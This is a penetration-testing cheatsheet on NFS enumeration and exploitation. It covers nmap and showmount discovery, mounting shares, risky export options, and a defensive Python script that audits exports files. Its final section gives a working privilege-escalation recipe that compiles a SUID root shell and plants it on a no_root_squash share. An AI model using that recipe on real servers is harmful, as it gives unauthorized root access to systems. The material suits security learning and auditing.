NFS (Network File System) Enumeration & Exploitation
Quick Summary
- NFS allows systems (typically UNIX/Linux) to share directories/files over a network as if they were local.
- Common ports: 111 (RPCbind) and 2049 (NFS).
- Relies on RPC (ONC-RPC/SUN-RPC) and XDR for data formatting.
- Authentication: usually via UID/GID mapping, making it insecure on untrusted networks.
- NFSv4+ improves security (Kerberos, ACLs, TCP-only, firewall-friendly, stateful).
Service Discovery
sudo nmap -p111,2049 -sV -sC <target>
The above command is for NFS & RPC detection
showmount -e <target>
The above command lists the NFS shares.
sudo nmap -sV -p111,2049 --script=nfs* <target>
The above command runs the nfs-* Nmap NSE scripts for deeper enumeration.
Mounting a Discovered Share
mkdir -p /mnt/nfs
The above command creates a mount point
sudo mount -t nfs <target>:/ /mnt/nfs -o nolock
The above command mounts the share (nolock avoids file-locking errors when the server's lock daemon is unavailable).
ls -l /mnt/nfs
The above command lists the share contents with owner user/group names.
ls -n /mnt/nfs
The above command lists the same contents with numeric UID/GID (useful for spotting IDs you can map locally).
tree /mnt/nfs
The above command shows directory structure.
Dangerous NFS Export Options
| Option | Risk Description |
|---|---|
| rw | Writable share (modification possible). |
| insecure | Allows client ports >1024 (user-level access). |
| no_root_squash | Root on client = root on server. Exploitable! |
| nohide | Exports submounted FS without separate entries. |
🔧 Default Exports Configuration
cat /etc/exports
The above command views NFS exports.
echo '/mnt/nfs <target>/24(sync,no_subtree_check)' >> /etc/exports
The above command appends an export of /mnt/nfs for the <target>/24 network.
exportfs -a
The above command re-exports every entry in /etc/exports so the change takes effect.
systemctl restart nfs-kernel-server
The above command restarts the NFS server (an alternative way to apply the change).
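As an added example (not part of the original cheatsheet), the following audit script parses an exports(5)-style file and flags the four risky options from the table above, plus two conditions beyond the table: a wildcard client (exported to every host) and the rw + no_root_squash combination that enables the privilege-escalation path described later. The sample exports content is constructed; RISKY_OPTIONS, parse_exports and audit_exports are names chosen here.

```python
import re
from typing import Dict, List, Tuple

# Export options the table above calls out, with their risk text.
RISKY_OPTIONS = {
    "rw": "writable share (modification possible)",
    "insecure": "allows client ports >1024 (user-level access)",
    "no_root_squash": "root on client = root on server",
    "nohide": "exports submounted filesystems without separate entries",
}

# Constructed sample /etc/exports content (not taken from a real host).
SAMPLE_EXPORTS = """\
# constructed sample
/srv/share     10.0.0.0/24(rw,sync,no_subtree_check)
/export/ro     192.168.1.5(ro,sync,root_squash)
/home          *(rw,no_root_squash,insecure)
/var/nfs/gen   *(rw,sync,no_root_squash,nohide)
/backup        backup.example.internal
"""

# token = client[(opt,opt,...)]; a bare "(opts)" token has no client part.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, client, options) triples from exports(5)-style text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for token in clients:
            m = CLIENT_RE.match(token)
            # "host (rw)" with a space exports to everyone, per exports(5)
            client = m.group(1) or "*"
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((path, client, opts))
    return entries


def audit_exports(text: str) -> Dict[str, List[str]]:
    """Map "path -> client" to the list of risk findings for that export."""
    findings: Dict[str, List[str]] = {}
    for path, client, opts in parse_exports(text):
        hits = [f"{o}: {RISKY_OPTIONS[o]}" for o in opts if o in RISKY_OPTIONS]
        if client == "*":
            hits.append("wildcard client: exported to every host")
        if "rw" in opts and "no_root_squash" in opts:
            hits.append("rw + no_root_squash: client root can plant SUID binaries")
        if hits:
            findings[f"{path} -> {client}"] = hits
    return findings
```

Feed it the output of `cat /etc/exports` on a server you administer to get a per-export list of what to tighten (ro, root_squash, secure, explicit hosts).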
Privilege Escalation Tips
If no_root_squash is enabled:
echo -e '#include <stdlib.h>\n#include <unistd.h>\nint main() { setuid(0); system("/bin/bash"); }' > shell.c
gcc shell.c -o shell
chmod +s shell
The three above commands create a SUID shell locally.
cp shell /mnt/nfs/
The above command copies the shell to the mounted NFS.
Unmount NFS
sudo umount /mnt/nfs
The above command unmounts the share.